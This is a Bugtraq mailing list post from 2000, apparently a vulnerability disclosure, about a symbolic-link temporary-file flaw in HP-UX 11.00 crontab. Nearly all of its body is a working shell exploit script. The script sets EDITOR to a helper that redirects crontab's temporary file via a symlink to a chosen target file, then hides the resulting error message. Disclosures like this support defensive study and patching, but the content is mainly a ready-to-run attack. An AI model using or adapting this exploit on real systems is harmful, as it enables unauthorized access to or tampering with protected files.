[17309] in bugtraq
HP-UX crontab exploit
daemon@ATHENA.MIT.EDU (Kyong-won Cho)
Mon Oct 23 23:55:07 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="ks_c_5601-1987"
Content-Transfer-Encoding: 7bit
Message-Id: <003101c03d56$2a064670$071bebcb@swat.hackerslab.com>
Date: Tue, 24 Oct 2000 10:03:04 +0900
Reply-To: Kyong-won Cho <dubhe@HACKERSLAB.COM>
From: Kyong-won Cho <dubhe@HACKERSLAB.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
[ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link
vulnerability
Attach
====================== crontab.sh ================================
#!/bin/sh
#
# HP-UX 11.00 crontab
#
# Kyong-won,Cho
#
# dubhe@hackerslab.com
#
# Usage : ./crontab.sh <distfile>
#
#
if [ -z "$1" ]
then
echo "Usage : $0 <distfile>"
exit
fi
cat << _EOF_ > /tmp/crontab_exp
#!/bin/sh
ln -sf $1 \$1
_EOF_
chmod 755 /tmp/crontab_exp
EDITOR=/tmp/crontab_exp
export EDITOR
crontab -e 2> /tmp/crontab$$
grep -v "error on previous line" /tmp/crontab$$
rm -f /tmp/crontab_exp /tmp/crontab$$
==================================================end
